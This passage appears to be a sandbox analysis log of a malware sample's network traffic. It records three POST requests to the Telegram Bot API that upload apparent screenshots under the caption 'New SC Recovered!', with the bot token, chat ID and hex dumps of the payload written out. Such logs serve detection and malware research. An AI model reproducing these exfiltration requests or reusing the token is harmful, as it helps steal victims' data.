                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.449746149.154.167.2204436768C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:38:45 UTC262OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcaa4c722ca350
                                                Host: api.telegram.org
                                                Content-Length: 66995
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:38:46 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 61 34 63 37 32 32 63 61 33 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 61 34 63 37 32 32 63 61 33 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 32 32 2f 32 30 32 34 20 31 32 3a 33 37 3a 32 30 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcaa4c722ca350Content-Disposition: form-data; name="chat_id"1165128482-----------------------------8dcaa4c722ca350Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/22/2024 12:37:20User
                                                2024-05-17 23:38:46 UTC16355OUTData Raw: f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 5b cd 07 fa d8 d9 41 e8 48 e0 fd 0d 45 5b 26 9e c6 2d 35 a3 0a 4a 5a 28 10
                                                Data Ascii: br$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T[AHE[&-5JZ(
                                                2024-05-17 23:38:46 UTC16355OUTData Raw: 5a bd 8e fa f2 e1 21 b2 92 79 0e d4 52 39 c6 7b 8f 4a a1 7b aa 59 4f a5 5c a2 5c a3 3b 46 40 1c 82 78 f7 ae 50 4f 32 c2 d0 89 5b ca 6e a9 9e 0f e1 51 d5 c3 02 93 bb 63 a9 99 ca 4a d1 8e 96 0a 28 a2 bd 03 c9 0a 28 a2 80 12 ba 3f 0a 4f 0c 31 dd 79 b3 47 1e 4a e3 7b 01 9e be b5 ce 51 58 d7 a5 ed 61 cb 7b 1d 38 6a fe c2 a7 3d ae 7a 17 db ec ff 00 e7 f2 0f fb fa bf e3 49 f6 fb 2f f9 fc b7 ff 00 bf ab fe 35 e7 d4 57 17 f6 7f f7 bf 0f f8 27 a3 fd ad fd cf c7 fe 01 e8 3f 6f b2 ff 00 9f cb 7f fb fa bf e3 5c 7e bf 24 72 eb 13 bc 4e ae 87 6e 19 4e 41 f9 47 7a ce a2 b6 a1 84 f6 53 e6 e6 b9 cf 89 c7 fb 78 72 72 db e7 ff 00 00 28 a2 8a ed 3c e0 a2 8a 28 03 4b c3 9f f2 1d b6 ff 00 81 7f e8 26 bb aa f3 3a 4c 0f 4a e0 c4 61 25 56 7c c9 9e a6 17 1d 1a 14 f9 1a b9 e9 b4 57
                                                Data Ascii: Z!yR9{J{YO\\;F@xPO2[nQcJ((?O1yGJ{QXa{8j=zI/5W'?o\~$rNnNAGzSxrr(<(K&:LJa%V|W
                                                2024-05-17 23:38:46 UTC16355OUTData Raw: 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b 7d ac e7 ec fe 5e ec 6c 5f f9 e9 c6 3f 5a e4 a8 e5 2a 6f 9f ba 47 7c 52 53 f7 4d ef ed 68 ff 00 e7 be 9f ff 00 81 9f fd 8d 62 78 b3 fe 42 b1 ff 00 d7 05 ff 00 d0 9a b4 b7 6a 5f dc d6 3f f2 4e b3 7c 59 ff 00 21 58 ff 00 eb 82 ff 00 e8 4d 59 61 d2 55 a3 6f 3f c8 cf 1b 7f ab 4e fe 5f 9a 31 28 a2 8a f6 4f 9a 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b
                                                Data Ascii: `yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K}^l_?Z*oG|RSMhbxBj_?N|Y!XMYaUo?N_1(O((Q@Q@E-R@EPEPEPEPEPQK
                                                2024-05-17 23:38:46 UTC15447OUTData Raw: 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 30 a2 8a 28 01 28 a2 8a 00 28 a2 8a 06 14 86 97 b5 25 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 51 4c 61 45 14 50 02 51 46 69 33 40 c5 a4 a4 a2 80 b0 67 da 93 34 51 40 c2 92 96 92 80 0a 4a 5a 4a 06 14 51 45 03 0a 4a 28 a0 02 92 96 92 81 85 14 51 40 09 45 14 50 31 0d 14 51 40 05 25 2d 25 03 0a 4a 5a 4a 00 29 29 68 a0 a1 28 a2 92 80 42 d2 51 45 00 21 a2 8a 28 18 52 52 d2 50 30 a4 a2 8a 00 4a 29 69 28 18 52 52 d2 50 30 a4 a2 8a 00 29 29 68 a0 62 51 45 14 0c 29 28 a4 a0 05 a4 a2 8a 06 1c 51 49 45 00 14 51 45 03 12 8a 28 a0 62 51 45 14 00 51 45 25 31 87 f3 a2 8f ca 83 48 62 1e 39 a2 8a 29 80 9f 8d 1c 51 45 03 0a 4e 29 69 38 a4 01 ef 47 d2 8a 29 80 94 be
                                                Data Ascii: (((RRPEP0(((%QE%Q@(ZJQEQLaEPQFi3@g4Q@JZJQEJ(Q@EP1Q@%-%JZJ))h(BQE!(RRP0J)i(RRP0))hbQE)(QIEQE(bQEQE%1Hb9)QEN)i8G)
                                                2024-05-17 23:38:46 UTC1409OUTData Raw: 03 e7 da 28 a2 b5 30 36 f4 cf 12 4f 67 63 f6 0b 9b 58 2f ec f3 b9 61 b8 5c 85 3e a0 f6 fc 28 d4 fc 49 3d e5 8f d8 2d ad 60 b0 b3 ce e6 86 dd 70 18 fa 93 df f1 ac 4a 4a 2c 17 0a 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb
                                                Data Ascii: (06OgcX/a\>(I=-`pJJ,(Q@>'..V/1q\:39u{<3+O$>(((t18[G\?*ImyM c`:h(%mX*:BlnN3ETb{uw}(j"X'm+zN
                                                2024-05-17 23:38:46 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 61 34 63 37 32 32 63 61 33 35 30 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcaa4c722ca350--
                                                2024-05-17 23:38:46 UTC25INHTTP/1.1 100 Continue
                                                2024-05-17 23:38:46 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:38:46 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.449747149.154.167.2204436768C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:38:49 UTC262OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcad575d0aaf1f
                                                Host: api.telegram.org
                                                Content-Length: 66995
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:38:49 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 64 35 37 35 64 30 61 61 66 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 64 35 37 35 64 30 61 61 66 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 32 36 2f 32 30 32 34 20 30 39 3a 33 33 3a 31 30 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcad575d0aaf1fContent-Disposition: form-data; name="chat_id"1165128482-----------------------------8dcad575d0aaf1fContent-Disposition: form-data; name="caption"New SC Recovered!Time: 07/26/2024 09:33:10User
                                                2024-05-17 23:38:49 UTC16355OUTData Raw: f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 5b cd 07 fa d8 d9 41 e8 48 e0 fd 0d 45 5b 26 9e c6 2d 35 a3 0a 4a 5a 28 10
                                                Data Ascii: br$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T[AHE[&-5JZ(
                                                2024-05-17 23:38:49 UTC16355OUTData Raw: 5a bd 8e fa f2 e1 21 b2 92 79 0e d4 52 39 c6 7b 8f 4a a1 7b aa 59 4f a5 5c a2 5c a3 3b 46 40 1c 82 78 f7 ae 50 4f 32 c2 d0 89 5b ca 6e a9 9e 0f e1 51 d5 c3 02 93 bb 63 a9 99 ca 4a d1 8e 96 0a 28 a2 bd 03 c9 0a 28 a2 80 12 ba 3f 0a 4f 0c 31 dd 79 b3 47 1e 4a e3 7b 01 9e be b5 ce 51 58 d7 a5 ed 61 cb 7b 1d 38 6a fe c2 a7 3d ae 7a 17 db ec ff 00 e7 f2 0f fb fa bf e3 49 f6 fb 2f f9 fc b7 ff 00 bf ab fe 35 e7 d4 57 17 f6 7f f7 bf 0f f8 27 a3 fd ad fd cf c7 fe 01 e8 3f 6f b2 ff 00 9f cb 7f fb fa bf e3 5c 7e bf 24 72 eb 13 bc 4e ae 87 6e 19 4e 41 f9 47 7a ce a2 b6 a1 84 f6 53 e6 e6 b9 cf 89 c7 fb 78 72 72 db e7 ff 00 00 28 a2 8a ed 3c e0 a2 8a 28 03 4b c3 9f f2 1d b6 ff 00 81 7f e8 26 bb aa f3 3a 4c 0f 4a e0 c4 61 25 56 7c c9 9e a6 17 1d 1a 14 f9 1a b9 e9 b4 57
                                                Data Ascii: Z!yR9{J{YO\\;F@xPO2[nQcJ((?O1yGJ{QXa{8j=zI/5W'?o\~$rNnNAGzSxrr(<(K&:LJa%V|W
                                                2024-05-17 23:38:49 UTC16355OUTData Raw: 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b 7d ac e7 ec fe 5e ec 6c 5f f9 e9 c6 3f 5a e4 a8 e5 2a 6f 9f ba 47 7c 52 53 f7 4d ef ed 68 ff 00 e7 be 9f ff 00 81 9f fd 8d 62 78 b3 fe 42 b1 ff 00 d7 05 ff 00 d0 9a b4 b7 6a 5f dc d6 3f f2 4e b3 7c 59 ff 00 21 58 ff 00 eb 82 ff 00 e8 4d 59 61 d2 55 a3 6f 3f c8 cf 1b 7f ab 4e fe 5f 9a 31 28 a2 8a f6 4f 9a 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b
                                                Data Ascii: `yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K}^l_?Z*oG|RSMhbxBj_?N|Y!XMYaUo?N_1(O((Q@Q@E-R@EPEPEPEPEPQK
                                                2024-05-17 23:38:49 UTC15447OUTData Raw: 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 30 a2 8a 28 01 28 a2 8a 00 28 a2 8a 06 14 86 97 b5 25 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 51 4c 61 45 14 50 02 51 46 69 33 40 c5 a4 a4 a2 80 b0 67 da 93 34 51 40 c2 92 96 92 80 0a 4a 5a 4a 06 14 51 45 03 0a 4a 28 a0 02 92 96 92 81 85 14 51 40 09 45 14 50 31 0d 14 51 40 05 25 2d 25 03 0a 4a 5a 4a 00 29 29 68 a0 a1 28 a2 92 80 42 d2 51 45 00 21 a2 8a 28 18 52 52 d2 50 30 a4 a2 8a 00 4a 29 69 28 18 52 52 d2 50 30 a4 a2 8a 00 29 29 68 a0 62 51 45 14 0c 29 28 a4 a0 05 a4 a2 8a 06 1c 51 49 45 00 14 51 45 03 12 8a 28 a0 62 51 45 14 00 51 45 25 31 87 f3 a2 8f ca 83 48 62 1e 39 a2 8a 29 80 9f 8d 1c 51 45 03 0a 4e 29 69 38 a4 01 ef 47 d2 8a 29 80 94 be
                                                Data Ascii: (((RRPEP0(((%QE%Q@(ZJQEQLaEPQFi3@g4Q@JZJQEJ(Q@EP1Q@%-%JZJ))h(BQE!(RRP0J)i(RRP0))hbQE)(QIEQE(bQEQE%1Hb9)QEN)i8G)
                                                2024-05-17 23:38:49 UTC1409OUTData Raw: 03 e7 da 28 a2 b5 30 36 f4 cf 12 4f 67 63 f6 0b 9b 58 2f ec f3 b9 61 b8 5c 85 3e a0 f6 fc 28 d4 fc 49 3d e5 8f d8 2d ad 60 b0 b3 ce e6 86 dd 70 18 fa 93 df f1 ac 4a 4a 2c 17 0a 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb
                                                Data Ascii: (06OgcX/a\>(I=-`pJJ,(Q@>'..V/1q\:39u{<3+O$>(((t18[G\?*ImyM c`:h(%mX*:BlnN3ETb{uw}(j"X'm+zN
                                                2024-05-17 23:38:49 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 64 35 37 35 64 30 61 61 66 31 66 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcad575d0aaf1f--
                                                2024-05-17 23:38:50 UTC25INHTTP/1.1 100 Continue
                                                2024-05-17 23:38:50 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:38:50 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.449748149.154.167.2204436768C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:38:58 UTC262OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcb1fe0d5217c4
                                                Host: api.telegram.org
                                                Content-Length: 66995
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:38:58 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 31 66 65 30 64 35 32 31 37 63 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 31 66 65 30 64 35 32 31 37 63 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 30 31 2f 32 30 32 34 20 30 37 3a 33 36 3a 32 32 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcb1fe0d5217c4Content-Disposition: form-data; name="chat_id"1165128482-----------------------------8dcb1fe0d5217c4Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/01/2024 07:36:22User
                                                2024-05-17 23:38:58 UTC16355OUTData Raw: f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 5b cd 07 fa d8 d9 41 e8 48 e0 fd 0d 45 5b 26 9e c6 2d 35 a3 0a 4a 5a 28 10
                                                Data Ascii: br$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T[AHE[&-5JZ(
                                                2024-05-17 23:38:58 UTC16355OUTData Raw: 5a bd 8e fa f2 e1 21 b2 92 79 0e d4 52 39 c6 7b 8f 4a a1 7b aa 59 4f a5 5c a2 5c a3 3b 46 40 1c 82 78 f7 ae 50 4f 32 c2 d0 89 5b ca 6e a9 9e 0f e1 51 d5 c3 02 93 bb 63 a9 99 ca 4a d1 8e 96 0a 28 a2 bd 03 c9 0a 28 a2 80 12 ba 3f 0a 4f 0c 31 dd 79 b3 47 1e 4a e3 7b 01 9e be b5 ce 51 58 d7 a5 ed 61 cb 7b 1d 38 6a fe c2 a7 3d ae 7a 17 db ec ff 00 e7 f2 0f fb fa bf e3 49 f6 fb 2f f9 fc b7 ff 00 bf ab fe 35 e7 d4 57 17 f6 7f f7 bf 0f f8 27 a3 fd ad fd cf c7 fe 01 e8 3f 6f b2 ff 00 9f cb 7f fb fa bf e3 5c 7e bf 24 72 eb 13 bc 4e ae 87 6e 19 4e 41 f9 47 7a ce a2 b6 a1 84 f6 53 e6 e6 b9 cf 89 c7 fb 78 72 72 db e7 ff 00 00 28 a2 8a ed 3c e0 a2 8a 28 03 4b c3 9f f2 1d b6 ff 00 81 7f e8 26 bb aa f3 3a 4c 0f 4a e0 c4 61 25 56 7c c9 9e a6 17 1d 1a 14 f9 1a b9 e9 b4 57
                                                Data Ascii: Z!yR9{J{YO\\;F@xPO2[nQcJ((?O1yGJ{QXa{8j=zI/5W'?o\~$rNnNAGzSxrr(<(K&:LJa%V|W
                                                2024-05-17 23:38:58 UTC16355OUTData Raw: 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b 7d ac e7 ec fe 5e ec 6c 5f f9 e9 c6 3f 5a e4 a8 e5 2a 6f 9f ba 47 7c 52 53 f7 4d ef ed 68 ff 00 e7 be 9f ff 00 81 9f fd 8d 62 78 b3 fe 42 b1 ff 00 d7 05 ff 00 d0 9a b4 b7 6a 5f dc d6 3f f2 4e b3 7c 59 ff 00 21 58 ff 00 eb 82 ff 00 e8 4d 59 61 d2 55 a3 6f 3f c8 cf 1b 7f ab 4e fe 5f 9a 31 28 a2 8a f6 4f 9a 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b
                                                Data Ascii: `yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K}^l_?Z*oG|RSMhbxBj_?N|Y!XMYaUo?N_1(O((Q@Q@E-R@EPEPEPEPEPQK
                                                2024-05-17 23:38:58 UTC15447OUTData Raw: 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 30 a2 8a 28 01 28 a2 8a 00 28 a2 8a 06 14 86 97 b5 25 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 51 4c 61 45 14 50 02 51 46 69 33 40 c5 a4 a4 a2 80 b0 67 da 93 34 51 40 c2 92 96 92 80 0a 4a 5a 4a 06 14 51 45 03 0a 4a 28 a0 02 92 96 92 81 85 14 51 40 09 45 14 50 31 0d 14 51 40 05 25 2d 25 03 0a 4a 5a 4a 00 29 29 68 a0 a1 28 a2 92 80 42 d2 51 45 00 21 a2 8a 28 18 52 52 d2 50 30 a4 a2 8a 00 4a 29 69 28 18 52 52 d2 50 30 a4 a2 8a 00 29 29 68 a0 62 51 45 14 0c 29 28 a4 a0 05 a4 a2 8a 06 1c 51 49 45 00 14 51 45 03 12 8a 28 a0 62 51 45 14 00 51 45 25 31 87 f3 a2 8f ca 83 48 62 1e 39 a2 8a 29 80 9f 8d 1c 51 45 03 0a 4e 29 69 38 a4 01 ef 47 d2 8a 29 80 94 be
                                                Data Ascii: (((RRPEP0(((%QE%Q@(ZJQEQLaEPQFi3@g4Q@JZJQEJ(Q@EP1Q@%-%JZJ))h(BQE!(RRP0J)i(RRP0))hbQE)(QIEQE(bQEQE%1Hb9)QEN)i8G)
